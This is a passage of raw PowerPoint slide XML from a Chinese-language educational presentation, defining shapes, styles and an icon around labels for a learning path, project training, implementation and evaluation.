                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实施</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13895" y="6880"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目训练</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="86" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16233" y="2830"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="87" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="88" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="89" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId6"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="90" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId7"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="91" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId8"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="92" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Text Placeholder 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16635" y="6800"/>
              <a:ext cx="1600" cy="484"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" baseline="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0">
                <a:buNone/>
                <a:defRPr sz="1200"/>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0">
                <a:buNone/>
                <a:defRPr sz="1000"/>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl5pPr>
              <a:lvl6pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl6pPr>
              <a:lvl7pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl7pPr>
              <a:lvl8pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl8pPr>
              <a:lvl9pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>项目评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4505325" y="1420495"/>
            <a:ext cx="2266950" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>学习路径</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
